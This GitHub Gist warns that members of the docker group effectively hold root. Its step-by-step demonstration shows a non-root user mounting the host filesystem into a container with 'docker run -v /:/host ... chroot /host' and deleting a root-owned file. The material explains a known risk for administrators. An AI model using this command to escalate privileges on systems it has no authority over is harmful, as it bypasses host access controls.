Last active
May 8, 2023 03:57
-
-
Save nileshsimaria/82ed9eaf116832a8d7128ecb08dddc11 to your computer and use it in GitHub Desktop.
A user belongs to docker group can gain root access on your host
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Be careful if you are adding user to docker group. | |
1. As a root, create a file (owner root and group root) | |
$ touch /etc/foo | |
$ ls -l /etc/foo | |
-rw-r--r-- 1 root root 0 Dec 5 17:40 /etc/foo | |
2. Login as a non-root user belongs to docker group. In my example its user u1. | |
$ id | |
uid=1002(u1) gid=1002(u1) groups=1002(u1),999(docker) | |
3. Since the user belongs to docker group, it has access of all of the docker commands like | |
docker run, docker ps, etc. | |
That user can spin up a new container which can mount "/" and then chroot to it as shown below. | |
$ docker run -ti -v /:/host fedora chroot /host | |
4. Now the user u1 (non-root) has access of root, so u1 can delete the file from within container we created earlier as root. | |
$ rm /etc/foo (This is from inside the fedora container) | |
5. From the root, verify the file is actually gone (deleted by user u1) | |
$ ls -l /etc/foo | |
ls: cannot access '/etc/foo': No such file or directory |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment